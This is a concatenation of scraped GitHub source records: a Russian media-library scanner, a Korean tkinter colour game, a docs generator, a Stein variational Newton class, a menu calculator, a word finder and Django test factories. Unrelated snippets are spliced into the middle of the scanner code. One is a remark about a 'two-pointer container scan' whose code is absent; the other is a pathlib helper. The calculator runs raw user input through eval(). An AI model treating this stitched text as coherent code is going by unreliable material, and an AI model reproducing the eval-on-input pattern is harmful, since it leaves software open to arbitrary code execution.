print(k[i])\n while i < len(k):\n if mult in k[i]:\n directory = k[i].replace(mult, '')\n if 
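The two-pointer container scan above is safe because advancing the pointer at the shorter line never skips a better answer: any container that keeps the shorter side is capped by that height with a smaller width. A brute-force cross-check on the sample input (sketch):

from itertools import combinations

def max_area_brute(height):
    return max((j - i) * min(height[i], height[j])
               for i, j in combinations(range(len(height)), 2))

assert max_area_brute([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49  # agrees with maxArea above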
k[i].count('/') > scanpath.count('/') + 2:\n pathid = directory.find('/')\n subdir = directory[pathid + 1:directory.find('/', pathid + 1)]\n path = directory[0:pathid]\n if subdir.find(\"[\") == -1:\n autor = directory[directory.rfind(subdir):directory.rfind(\"/\")].replace(subdir + \"/\", \"\")\n print(autor)\n else:\n autor = subdir[subdir.find(\"[\") + 1:subdir.find(\"]\")]\n while path + \"/\" + subdir in k[i] and i < len(k):\n subid = k[i].rfind(\"/\")\n subtitle = k[i][subid + 1::]\n nameofsub = remove(subtitle.replace(\".ass\", \"\"))\n full_path = k[i].replace(mult + path, \"\")\n if len(autor) == 0:\n autor = \"Нету\"\n subs.append({'name': nameofsub,\n 'autor': autor,\n 'full_name': subtitle,\n 'directory': path,\n 'full_path': full_path})\n print(subtitle)\n if i + 1 < len(k):\n if path + \"/\" + subdir not in k[i + 1]:\n break\n else:\n break\n i += 1\n i += 1\n return subs\n\n\ndef find_audio_mult():\n \"\"\"\n Функция поиска озвучек к мультикам в форматах ac3 и mka\n :return: список словарей с озвучками\n \"\"\"\n audio = []\n # os.system(f\"find {scanpath} -name *.ass > subs.txt\")\n try:\n for root, dirs, files in os.walk(f\"{scanpath}/Мультики\"):\n for file in files:\n if file.endswith(\".mka\") or file.endswith(\".ac3\"):\n autor = root[root.rfind(\"/\")+1:]\n directory = root.replace(scanpath + \"/Мультики/\", \"\")\n audio.append({\"name\": remove(os.path.splitext(file)[0]),\n \"full_name\": file,\n \"autor\": autor,\n \"directory\": directory[:directory.rfind(\"/\")],\n \"full_path\": os.path.join(root, file).replace(scanpath+\"/Мультики/\", \"\")})\n return audio\n except FileNotFoundError as e:\n print(\"Нет такого файла или каталога:\", str(e)[str(e).find(\"'\"):str(e).rfind(\"'\")+1])\n\n\ndef export(mults, i):\n \"\"\"\n Экпортирует данные в базу данных\n :type mults: dict\n :param mults:\n :type i: bool\n :param i: Какой словарь? 
True - Мультфильмы, False - Фильмы\n :return:\n \"\"\"\n if len(mults) == 0:\n print(\"Экспортировать нечего\")\n sys.exit()\n else:\n if i:\n Database.export_mult(mults)\n else:\n Database.export_film(mults)\n\n\ndef prepare_to_export(path, film):\n \"\"\"\n Функция подготовки к экспорту\n :type path: str\n :param path: Строка пути к файлу\n :type film: str\n :param film: Строка пути к папке с фильмами/мультиками\n :return: Обрезанные имя файла, путь к файлу, Тип (Сериал или нет)\n \"\"\"\n directory = path.replace(film, '')\n if path.count('/') > scanpath.count('/') + 2:\n serial = True\n pathid = directory.find('/')\n path = directory[0:pathid]\n print(path)\n name = directory[0:pathid].replace(\"_\", \" \")\n name = name.replace(\".1.\", \".\")\n name = remove(name.replace(\".\", \" \"))\n else:\n path = directory\n name = directory.replace(\"_\", \" \")\n name = remove(name.replace(r'\\.(?=.*?\\.)', ''))\n serial = False\n return name, path, serial\n\n\ndef check_files_mkv_film():\n \"\"\"\n Сканирует папку на наличие фильмов и если это сериал делит по сериям\n :return: Словарь с фильмами\n \"\"\"\n k = find_files(scanpath, ['.mkv'])\n film = scanpath + \"/Фильмы/\"\n i = 0\n while i < len(k):\n if film in k[i]:\n name, path, serial = prepare_to_export(k[i], film)\n series = []\n if serial:\n while path in k[i]:\n seria = k[i].replace(film, '')[k[i].replace(film, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(film, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'full_path': full_path})\n print(seria)\n try:\n if path not in k[i + 1]:\n break\n except IndexError:\n break\n i += 1\n else:\n seria = k[i].replace(film, '')[k[i].replace(film, '').find('/') + 1::]\n nameofseria = remove(seria)\n full_path = k[i].replace(film, \"\")\n series.append({'name': nameofseria,\n 'full_name': seria,\n 'full_path': full_path})\n print(seria)\n films.append({'name': name,\n 'directory': path,\n 'series': series,\n 'detail': kinopoisk_parcer.tryKinopoisk(name)})\n i += 1\n return films\n\n\ndef find_new_mult(): # Делаем запрос к БД и ищем совпадения названий серий и папок с теми что есть\n \"\"\"\n Сканирует каталог на наличие Мультфильмов, затем делает запрос к БД. 
Если найденых файлов в базе нет -> добавляем\n :return: None\n \"\"\"\n series = Database.get_mults()\n mult = scanpath + \"/Мультики/\"\n k = find_files(mult, ['.mkv'])\n i = 0\n mm = []\n while i < len(k) and mult in k[i]:\n name, ser, path, i = find_series_mult(k, i, mult)\n mm.append({'name': name,\n 'series': ser,\n 'path': path})\n i += 1\n ser = [{}, ]\n for title_local in mm:\n for title_BD in series:\n if title_BD['title_name'] == title_local['path']:\n for ser_title_local in title_local['series']:\n if ser_title_local['full_name'] in [ser_title_BD[0] for ser_title_BD in title_BD['serie_name']]:\n pass\n else:\n print(ser_title_local['full_name'], \" --> \", \"НЕТУ\")\n ser.append({'name': ser_title_local['name'],\n 'full_name': ser_title_local['full_name']})\n Database.export_series(ser, title_BD['id'])\n series = Database.get_mults()\n break\n\n\ndef remove(k):\n \"\"\"\n Принимает на вход строку и удаляет из нее все запрещенное\n :type k: str\n :param k: Строка перед обрезкой\n :return: Строка после обрезки\n \"\"\"\n linest = (\"(\", \")\", \"[\", \"]\", \"{\", \"}\")\n k = k.replace(\".1.\", \".\")\n if k.endswith((\"mkv\", \"avi\")):\n k = os.path.splitext(k)[0]\n k = k.replace(\".\", \" \")\n else:\n k = k.replace(\".\", \" \").strip()\n k = k.replace(\"_\", \" \")\n restart = True\n if linest[0] in k or linest[3] in k:\n while restart:\n string = k[k.find(linest[0]):k.find(linest[1]) + 1]\n string2 = k[k.find(linest[2]):k.find(linest[3]) + 1]\n string3 = k[k.find(linest[4]):k.find(linest[5]) + 1]\n k = k.replace(string, \"\")\n k = k.replace(string2, \"\")\n k = k.replace(string3, \"\")\n k = k.strip()\n if k.find(linest[0]) == -1 and k.find(linest[3]) == -1:\n restart = False\n z = open(\"forbidden.txt\", \"r\")\n words = [line[:-1] for line in z]\n z.close()\n for word in words:\n # if word in k:\n # k = k.replace(word, \"\").strip()\n copyk = k.lower().split()\n for i, w in enumerate(copyk):\n if word.lower() == w:\n k = k.split()\n k = k[:i]\n copyk = copyk[:i]\n k = \" \".join(k)\n #k = \"\".join(k.split().pop(i))\n if len(k) == 0:\n break\n return k\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n if (\"--new\" in sys.argv or \"-n\" in sys.argv) and (\"--mults\" in sys.argv or \"-m\" in sys.argv):\n find_new_mult()\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--films\" in sys.argv or \"-f\" in sys.argv):\n Database.drop(films=True)\n export(check_files_mkv_film(), False)\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--mults\" in sys.argv or \"-m\" in sys.argv):\n Database.drop(mults=True)\n export(mult_detail(check_files_mkv_mult()), True)\n Database.export_sub_audio(find_subs_mult(), \"subs\")\n Database.export_sub_audio(find_audio_mult(), \"audio\")\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--subs\" in sys.argv or \"-s\" in sys.argv):\n Database.drop(subs=True)\n Database.export_sub_audio(find_subs_mult(), \"subs\")\n elif (\"--drop\" in sys.argv or \"-d\" in sys.argv) and (\"--audio\" in sys.argv or \"-a\" in sys.argv):\n Database.drop(audio=True)\n Database.export_sub_audio(find_audio_mult(), \"audio\")\n elif \"--drop\" in sys.argv or \"-d\" in sys.argv:\n Database.drop(True, True, True, True)\n export(mult_detail(check_files_mkv_mult()), True)\n export(check_files_mkv_film(), False)\n Database.export_sub_audio(find_subs_mult(), \"subs\")\n Database.export_sub_audio(find_audio_mult(), \"audio\")\n elif \"--help\" in sys.argv or \"-h\" in sys.argv:\n print(\"-n, --new для поиска новых серий, c 
дополнительным параметром -m для мультиков, для фильмов -d -f\\n\"\n \"-d, --drop для сброса базы данных и нового сканирования\\n\"\n \"-h, --help для отображения помощи\")\n elif \"--new\" in sys.argv or \"-n\" in sys.argv:\n print(\"Необходим дополнительный параметр -m\")\n else:\n print(\"Ошибка в параметрах. Для вывода справки используйте параметр -h\")\n else:\n print(\"Необходим параметр\")\n","repo_name":"Howe251/site","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15434,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20691779073","text":"from tkinter import *\r\nimport time\r\nimport random\r\n\r\nclass draw:\r\n def __init__(self,x,y,w,h,color = \"white\"):\r\n self.__x = x\r\n self.__y = y\r\n self.__w = w\r\n self.__h = h\r\n self.__id = canvas.create_rectangle(self.__x,self.__y,self.__x+self.__w,self.__y+self.__h,fill=color)\r\n \r\n def setdraw(self,x,y,w,h,color = \"white\"):\r\n self.destroy\r\n self.__x = x\r\n self.__y = y\r\n self.__w = w\r\n self.__h = h \r\n self.__id = canvas.create_rectangle(self.__x,self.__y,self.__x+self.__w,self.__y+self.__h,fill=color)\r\n \r\n def getdraw(self):\r\n return (self.__x,self.__y,self.__w,self.__h)\r\n \r\n def getid(self):\r\n return self.__id\r\n \r\n def destroy(self):\r\n canvas.delete(self.__id)\r\n \r\n \r\ndef destory():\r\n for i in range(0,len(obj)):\r\n obj[i].destroy()\r\n del obj[:]\r\n\r\n\r\ndef setting_class(n_by_n,color):\r\n global land_set\r\n land_set = random.randrange(0,n_by_n**2)\r\n side_length=(800-10*(n_by_n-1))/n_by_n\r\n for i in range(0,n_by_n**2):\r\n if i != land_set:\r\n obj.append(draw(100+(side_length+10)*(i//n_by_n),100+(side_length+10)*(i%n_by_n),side_length,side_length,color[0]))\r\n else:\r\n obj.append(draw(100+(side_length+10)*(i//n_by_n),100+(side_length+10)*(i%n_by_n),side_length,side_length,color[1]))\r\n \r\ndef mouseclick_left(event):\r\n global count,score,score_text,wrong\r\n for i in range(len(obj)):\r\n if event.x > canvas.coords(obj[i].getid())[0] and event.y > canvas.coords(obj[i].getid())[1] and event.x < canvas.coords(obj[i].getid())[2] and event.y < canvas.coords(obj[i].getid())[3]:\r\n if i == land_set:\r\n count = 5\r\n score += 1\r\n destory()\r\n color=set_color(score)\r\n setting_class(score//10+2,color)\r\n break\r\n else:\r\n wrong = 1\r\n break\r\n\r\ndef mouseclick_right(event):\r\n global count,score,wrong\r\n if count<=0 or score>=40 or wrong == 1:\r\n canvas.delete(end_text)\r\n score = 0\r\n count = 5\r\n wrong = 0\r\n color=set_color(score)\r\n setting_class(score//10+2,color)\r\n \r\ndef press_key(event):\r\n key_set.add(event.keysym)\r\n \r\ndef Release_key(event):\r\n key_set.remove(event.keysym)\r\n \r\ndef set_color(score):\r\n plus_minus=(-1)**random.randrange(1)\r\n if score<=30:\r\n offset=plus_minus*(190-5*score)\r\n else:\r\n offset=plus_minus*(70-score)\r\n main_r=random.randrange(0,256)\r\n main_g=random.randrange(0,256)\r\n main_b=random.randrange(0,256)\r\n main_rgb=[main_r,main_g,main_b]\r\n point_rgb=[main_r,main_g,main_b]\r\n main_color='#%02x%02x%02x'%(main_r,main_g,main_b)\r\n change_parameter=random.randrange(0,3)\r\n who_is_changed=random.sample(range(0,3),change_parameter+1)\r\n for i in who_is_changed:\r\n point_rgb[i]=main_rgb[i]+offset\r\n if point_rgb[i]>255:\r\n point_rgb[i]=point_rgb[i]-255\r\n elif point_rgb[i]<0:\r\n point_rgb[i]=point_rgb[i]+255\r\n point_color='#%02x%02x%02x'%(point_rgb[0],point_rgb[1],point_rgb[2]) \r\n return 
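A pathlib variant of the extension scan used by the media scanner above (note one difference: unlike the os.walk call there, rglob does not follow symlinks):

from pathlib import Path

def find_files_pathlib(root_dir, exts):
    exts = tuple(exts)
    return [str(p) for p in Path(root_dir).rglob("*")
            if p.is_file() and p.name.endswith(exts)]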
[main_color,point_color]\r\n \r\n\r\n#Game Window\r\ngame = Tk()\r\ngame.title(\"PALLET\")\r\nwidth=1000\r\nheigh=1000\r\ncanvas = Canvas(game,width=width,heigh=heigh,bg=\"black\")\r\ncanvas.pack()\r\ncanvas.bind(\"\",mouseclick_left)\r\ncanvas.bind(\"\",mouseclick_right)\r\ncanvas.bind_all(\"\",press_key)\r\ncanvas.bind_all(\"\",Release_key)\r\nobj = []\r\nkey_set = set()\r\n\r\ncanvas.create_text(500, 350, text =\"색감 테스트 게임입니다\\n다른 색깔 하나를 찾아 클릭하세요 \", fill = \"white\", font = (\"맑은 고딕\", 30))\r\ncanvas.create_text(500, 700, text =\"시작하려면 아무키나 누르세요\", fill = \"red\", font = (\"맑은 고딕\", 30))\r\nwhile(True): \r\n if key_set :\r\n canvas.delete(\"all\") \r\n break\r\n game.update() \r\n time.sleep(0.01)\r\n\r\nland_set = 0\r\nscore = 0\r\ncount = 5\r\nwrong = 0\r\ndraw(5,5,55,55)\r\ncolor=set_color(score)\r\ncount_text = canvas.create_text(30,30,text = int(count),fill=\"black\",font=(\"맑은 고딕\",30))\r\nscore_text = canvas.create_text(870,50,text = 'SCORE : %d'%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\nend_text = 0\r\nsetting_class(score//10+2,color)\r\n\r\nwhile(True):\r\n canvas.delete(score_text)\r\n if count<=0:\r\n destory()\r\n canvas.delete(end_text)\r\n end_text = canvas.create_text(500,500,text = '제한시간이 경과하였습니다.\\n당신의 점수는 %d점 입니다.\\n\\n다시하려면 마우스 오른쪽을 클릭해 주세요.\\n아무키나 누르면 종료됩니다.'%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\n if key_set :\r\n break\r\n elif score>=40:\r\n destory()\r\n canvas.delete(end_text)\r\n end_text = canvas.create_text(500,500,text = \"흠 잡을 것도 없습니다!\\n당신은 완벽히 모든 색상을 구분하셨습니다.\\n\\n다시하려면 마우스 오른쪽을 클릭해 주세요.\\n아무키나 누르면 종료됩니다.\",fill=\"white\",font=(\"맑은 고딕\",30))\r\n if key_set :\r\n break\r\n elif wrong == 1:\r\n destory()\r\n canvas.delete(end_text)\r\n end_text = canvas.create_text(500,500,text = \"당신의 점수는 %d점입니다.\\n\\n다시하려면 마우스 오른쪽을 클릭해 주세요.\\n아무키나 누르면 종료됩니다.\"%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\n if key_set :\r\n break\r\n else:\r\n count = count -0.01\r\n canvas.delete(count_text)\r\n count_text = canvas.create_text(30,30,text = int(count),fill=\"black\",font=(\"맑은 고딕\",30))\r\n score_text = canvas.create_text(870,50,text = 'SCORE : %d'%score,fill=\"white\",font=(\"맑은 고딕\",30))\r\n game.update()\r\n time.sleep(0.01)\r\n \r\n ","repo_name":"thithin-ent/game_python","sub_path":"game_bugfix.py","file_name":"game_bugfix.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23801023472","text":"import os\nfrom pathlib import Path\n\nimport keras_autodoc\nimport tutobooks\n\nPAGES = {\n \"AutoML_for_NeuralNetworks.md\": [\n \"ai2business.ai_engines.automl_neural_network.AutoMLModels\",\n ],\n \"Key_Performance_Collection.md\": [\n \"ai2business.kpi_collector.trends_collector.TrendsCollector\",\n \"ai2business.kpi_collector.finance_collector.FinanceCollector\",\n ],\n \"Sample_Generators.md\": [\"ai2business.datasets.sample_generator.SampleGenerators\"],\n \"Oneliner.md\": [\"ai2business.macros.oneliner.TrendSearch\"],\n}\n\n\naliases_needed = [\n \"tensorflow.keras.callbacks.Callback\",\n \"tensorflow.keras.losses.Loss\",\n \"tensorflow.keras.metrics.Metric\",\n \"tensorflow.data.Dataset\",\n]\n\n\nROOT = \"https://ai2business.github.io/ai2business/\"\n\nai2business_dir = Path(__file__).resolve().parents[1]\n\n\ndef py_to_nb_md(dest_dir, dir_path=\"tutorials\"):\n for file_path in os.listdir(f\"{dir_path}/\"):\n\n file_name = file_path\n py_path = os.path.join(dir_path, file_path)\n file_name_no_ext = os.path.splitext(file_name)[0]\n ext = 
os.path.splitext(file_name)[1]\n\n if ext != \".py\":\n continue\n\n nb_path = os.path.join(\"ipynb\", file_name_no_ext + \".ipynb\")\n md_path = os.path.join(dest_dir, \"tutorials\", file_name_no_ext + \".md\")\n\n Path(nb_path).parent.mkdir(exist_ok=True)\n Path(md_path).parent.mkdir(exist_ok=True)\n\n tutobooks.py_to_nb(py_path, nb_path, fill_outputs=True)\n tutobooks.py_to_md(py_path, nb_path, md_path, \"templates/img\")\n github_repo_dir = \"ai2business/ai2business/blob/main/docs/\"\n with open(md_path, \"r\") as md_file:\n button_lines = [\n # \":material-link: \"\n \"[**View in Colab**](https://colab.research.google.com/github/\"\n + github_repo_dir\n + \"ipynb/\"\n + file_name_no_ext\n + \".ipynb\"\n + \")    \"\n # + ''\n # + \":octicons-octoface-16: \"\n \"[**GitHub source**](https://github.com/\"\n + github_repo_dir\n + \"tutorials/\"\n + file_name_no_ext\n + \".py)\",\n \"\\n\",\n ]\n md_content = \"\".join(button_lines) + \"\\n\" + md_file.read()\n\n with open(md_path, \"w+\") as md_file:\n md_file.write(md_content)\n\n\ndef generate(dest_dir):\n api_dir = ai2business_dir / \"docs\" / \"api\"\n template_dir = ai2business_dir / \"docs\" / \"templates\"\n doc_generator = keras_autodoc.DocumentationGenerator(\n PAGES,\n \"https://github.com/ai2business/ai2business/blob/main\",\n api_dir,\n template_dir,\n # ai2business_dir / 'examples',\n extra_aliases=aliases_needed,\n )\n doc_generator.generate(dest_dir)\n readme = (ai2business_dir / \"README.md\").read_text()\n index = (template_dir / \"index.md\").read_text()\n index = index.replace(\"{{autogenerated}}\", readme[readme.find(\"##\") :])\n (dest_dir / \"index.md\").write_text(index, encoding=\"utf-8\")\n py_to_nb_md(dest_dir)\n\n\nif __name__ == \"__main__\":\n generate(ai2business_dir / \"docs\" / \"sources\")\n","repo_name":"SimonBOai/ai2business","sub_path":"docs/autogen.py","file_name":"autogen.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16592471763","text":"#!/bin/python3\n\nfrom berkas import *\nfrom cpi import *\n\ndata_path = \"data.json\"\ntren_path = \"tren.json\"\n\ntren = trenFromJson(tren_path)\ndata = dataFromJson(data_path)\n\nif isValidData(data) and isValidTren(tren):\n\tprint(\"Data\")\n\tm = matriksData(data, tren)\n\tcetakMatriks(m)\n\tprint(\"\\nMinimum\")\n\tminim = genMinimum(m)\n\tcetakMatriks(minim)\n\tprint(\"\\nMatriks Perhitungan\")\n\thitung = genHitung(tren, minim, m)\n\tcetakMatriks(hitung)\n\tprint(\"\\nMatriks Skor Perhitungan\")\n\tskor = genSkor(hitung)\n\tcetakMatriks(skor)\n\tprint(\"\\nHasil\")\n\tfor v in genResult(skor, data, tren):\n\t\tprint(\"\" + str(v['res']) + \" = \" + str(v['nama']))\nelse:print(\"Error\")\n\n","repo_name":"AchmadRifai/pySpk","sub_path":"cpi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37447377330","text":"from ..svgd.mp_svgd import MP_SVGD\nfrom .svn import SVN\n\n\nclass MP_SVN(SVN, MP_SVGD):\n\n def __init__(\n self,\n kernel_base_type='RBF',\n kernel_structure=None,\n verbose=False,\n control_dim=None,\n repulsive_scaling=1,\n **kernel_params,\n ):\n\n super().__init__(\n kernel_base_type,\n kernel_structure,\n verbose,\n control_dim,\n repulsive_scaling,\n **kernel_params,\n )\n\n def get_second_variation(\n self,\n k_XX,\n dk_dk_t,\n Hess,\n ):\n \"\"\"\n\n Parameters\n ----------\n k_XX : tensor\n Kernel 
Grammian. Shape: [num_particles, num_particles, dim]\n dk_dk_t : tensor\n Outer products of kernel gradients.\n Shape: [num_particles, num_particles, dim, dim]\n Hess : tensor\n Hessian of log_prob.\n Shape: [num_particles, dim, dim]\n\n Returns\n -------\n H : tensor\n Second variation. Shape [num_particles, dim, dim].\n \"\"\"\n k_sq = (k_XX ** 2).unsqueeze(-1) # b x b x d x 1\n H_ii = - Hess * k_sq + dk_dk_t\n H = H_ii.mean(dim=1)\n return H\n\n def get_svgd_terms(\n self,\n X,\n dlog_p,\n M=None,\n ):\n\n # Use message-passing format\n return MP_SVGD.get_svgd_terms(\n self, X, dlog_p, M,\n )\n","repo_name":"sashalambert/stein_lib","sub_path":"stein_lib/svn/mp_svn.py","file_name":"mp_svn.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"39951374766","text":"# addition function\r\ndef add(ar1):\r\n res = 0\r\n for i in range(len(ar1)):\r\n res += ar1[i]\r\n return res\r\n\r\n\r\n# subtraction function\r\ndef sub(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res -= ar1[i]\r\n return res\r\n\r\n\r\n# multiplication function\r\ndef multi(ar1):\r\n res = 1\r\n for i in range(len(ar1)):\r\n res *= ar1[i]\r\n return res\r\n\r\n\r\n# division function\r\ndef div(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res /= ar1[i]\r\n return res\r\n\r\n\r\n# exponential function\r\ndef exp(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res **= ar1[i]\r\n return res\r\n\r\n\r\n# modulus function\r\ndef mod(ar1):\r\n res = ar1[0]\r\n for i in list(range(1, len(ar1))):\r\n res %= ar1[i]\r\n return res\r\n\r\n\r\n# hcf function\r\ndef hcf(ar1):\r\n flag = 0\r\n maximum = (max(ar1)) + 1\r\n maxi = []\r\n for i in range(1, maximum):\r\n for k in range(len(ar1)):\r\n if ar1[k] % i != 0:\r\n flag = 0\r\n break\r\n else:\r\n flag = 1\r\n continue\r\n if flag == 1:\r\n maxi.append(i)\r\n maximum = max(maxi)\r\n return maximum\r\n\r\n\r\n# lcm function\r\ndef lcm(ar1):\r\n boolea = False\r\n prod = 1\r\n n = 2\r\n while not boolea:\r\n abc = 0\r\n flag = 0\r\n for k in range(len(ar1)):\r\n if ar1[k] % n == 0:\r\n ar1[k] = ar1[k] / n\r\n abc = 0\r\n else:\r\n abc += 1\r\n # prod *= n\r\n if abc != len(ar1):\r\n prod *= n\r\n if abc == len(ar1):\r\n n += 1\r\n else:\r\n n = 2\r\n for k in range(len(ar1)):\r\n if ar1[k] == 1:\r\n flag += 1\r\n else:\r\n flag = 0\r\n if flag == len(ar1):\r\n boolea = True\r\n else:\r\n boolea = False\r\n return prod\r\n\r\n\r\n# user_input to the list\r\ndef user_input(ar1):\r\n user_stop = \" \"\r\n while user_stop != \"STOP\":\r\n print(\"Enter your number or write stop to terminate\")\r\n n = input()\r\n print()\r\n if n.isdigit():\r\n n = int(n)\r\n ar.append(n)\r\n continue\r\n else:\r\n if n.isalpha():\r\n user_stop = n.upper()\r\n if user_stop != \"STOP\":\r\n print(\"Check your input\")\r\n continue\r\n return ar1\r\n\r\n\r\nprint(\"*********************************Simple Calculator*********************************\")\r\nprint(\"You will be allowed to enter any number of input of numbers at a time until you write STOP \")\r\nar = []\r\nuser_string, again, user_exp, result = \" \", 1, 1, 1\r\n\r\n# operation choice\r\nwhile again == 1:\r\n print(\"Press 1 for Addition\")\r\n print(\"Press 2 for Subtraction\")\r\n print(\"Press 3 for Multiplication\")\r\n print(\"Press 4 for Division\")\r\n print(\"Press 5 for Exponentiation\")\r\n print(\"Press 6 for Modulus\")\r\n print(\"Press 7 for Highest Common Factor\")\r\n 
print(\"Press 8 for Least Common Multiple\")\r\n    print(\"Press 9 for Mixed Expression\")\r\n    print(\"Press 10 to Exit\")\r\n    print(\"Enter your choice --> \")\r\n    user_choice = int(input())\r\n    # addition\r\n    if user_choice == 1:\r\n        user_input(ar)\r\n        result = add(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # subtraction\r\n    elif user_choice == 2:\r\n        user_input(ar)\r\n        result = sub(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # multiplication\r\n    elif user_choice == 3:\r\n        user_input(ar)\r\n        result = multi(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # division\r\n    elif user_choice == 4:\r\n        user_input(ar)\r\n        result = div(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # exponentiation\r\n    elif user_choice == 5:\r\n        user_input(ar)\r\n        result = exp(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # modulus\r\n    elif user_choice == 6:\r\n        user_input(ar)\r\n        result = mod(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # highest common factor\r\n    elif user_choice == 7:\r\n        user_input(ar)\r\n        result = hcf(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # least common multiple\r\n    elif user_choice == 8:\r\n        user_input(ar)\r\n        result = lcm(ar)\r\n        print(\"Your result is \", result)\r\n\r\n    # mixed expression\r\n    elif user_choice == 9:\r\n        print(\r\n            \"Note: You are allowed to enter only one expression containing more than 2 operands and more than 2 \"\r\n            \"different operators among those given below only.\\n \"\r\n            \"Type '+' for addition\\n\"\r\n            \"Type '-' for subtraction\\n\"\r\n            \"Type '*' for multiplication\\n\"\r\n            \"Type '/' for division\\n\"\r\n            \"Type '**' for exponent\\n\"\r\n            \"Type '%' for modulus\\n\")\r\n        print(\"Enter your mathematical expression, following the rules given above\")\r\n        expression = str(input())\r\n        expression = expression.strip()\r\n        for j in range(0, len(expression), 2):\r\n            if not expression[j].isdigit():\r\n                print(\"Please check your expression and try again\")\r\n                break\r\n        for j in range(1, len(expression), 2):\r\n            # print(j)\r\n            if expression[j] != \"+\" and expression[j] != \"-\" and expression[j] != \"*\" and expression[j] != \"/\" and \\\r\n                    expression[j] != \"**\" and expression[j] != \"%\":\r\n                print(\"Please rectify your operator placements and try again\")\r\n                break\r\n        result = eval(expression)\r\n        print(\"Your result is \", result)\r\n        break\r\n\r\n    # exit\r\n    elif user_choice == 10:\r\n        print(\"Program has terminated successfully\")\r\n    else:\r\n        print(\"Wrong Input\")\r\n\r\n    print(\"\\n\\nPress 1 to rerun the program again.\")\r\n    print(\"Press any number to terminate completely.\\n\")\r\n    print(\"Enter your choice.\")\r\n    again = int(input())\r\n\r\n    # complete termination part\r\n    if again != 1:\r\n        quit()\r\n    # rerun part\r\n    else:\r\n        print(\"Press 1 to rerun the program from the starting.\")\r\n        print(\"Press any number to rerun the program with the result displayed.\")\r\n        print(\"Enter your choice\")\r\n        program_again = int(input())\r\n\r\n        if program_again == 1:  # rerun without the result\r\n            again = 1\r\n            continue\r\n        else:  # rerun with the result\r\n            ar.clear()\r\n            ar.append(result)\r\n            again = 1\r\n            continue\r\n","repo_name":"Riju-Saha/Calculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"9419140302","text":"\"\"\"\nUse the file containing a fragment of Pan Tadeusz. 
Find the longest word occurring in the given fragment\n\"\"\"\n\n\ndef load_content():\n    with open('pan_tadeusz.txt', encoding='utf-8') as f:\n        text_from_file = f.read()\n    return text_from_file\n\n\ndef clean_txt(text):\n    sig = '.,()!'\n    for i in sig:\n        text = text.replace(i, '')\n    return text\n\n\ndef find_max(text):\n    text = text.split()\n    max_index = 0\n    for index in range(len(text)):\n        if len(text[index]) > len(text[max_index]):\n            max_index = index\n    return text[max_index]\n\n\n#main\ncontent = load_content()\ncontent = clean_txt(content)\nprint(\"\\nLongest word in the file:\", find_max(content))\n","repo_name":"gekogit/pythonCourse","sub_path":"07-files/05 max sentence.py","file_name":"05 max sentence.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22062758915","text":"import factory\nfrom django.utils import timezone\nfrom factory import fuzzy\n\nfrom .models import CheckIn, Unit\n\n\nclass UserFactory(factory.django.DjangoModelFactory):\n    class Meta:\n        model = \"users.User\"\n\n    username = factory.Faker(\"user_name\")\n    email = factory.Faker(\"email\")\n    password = factory.Faker(\"password\")\n\n\nclass UnitFactory(factory.django.DjangoModelFactory):\n    class Meta:\n        model = Unit\n\n    # string, a dash, and two digits\n    identifier = factory.Sequence(\n        lambda n: f\"{fuzzy.FuzzyText(length=3).fuzz().lower()}-{n}{fuzzy.FuzzyInteger(0, 9).fuzz()}\"\n    )\n    created_by = factory.SubFactory(UserFactory)\n    date_created = factory.Faker(\"date_time_this_month\", tzinfo=timezone.get_current_timezone())\n\n\nclass CheckInFactory(factory.django.DjangoModelFactory):\n    class Meta:\n        model = CheckIn\n\n    unit = factory.SubFactory(UnitFactory)\n    date_created = factory.Faker(\"date_time_this_month\", tzinfo=timezone.get_current_timezone())\n    created_by = factory.SubFactory(UserFactory)\n    image = factory.Faker(\"image_url\")\n    message = factory.Faker(\"text\")\n    # name_of_place = factory.Faker(\"city\")\n    location = factory.LazyFunction(lambda: f\"{fuzzy.FuzzyFloat(-90, 90).fuzz()},{fuzzy.FuzzyFloat(-180, 180).fuzz()}\")\n","repo_name":"jvacek/FlameRelay","sub_path":"flamerelay/backend/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
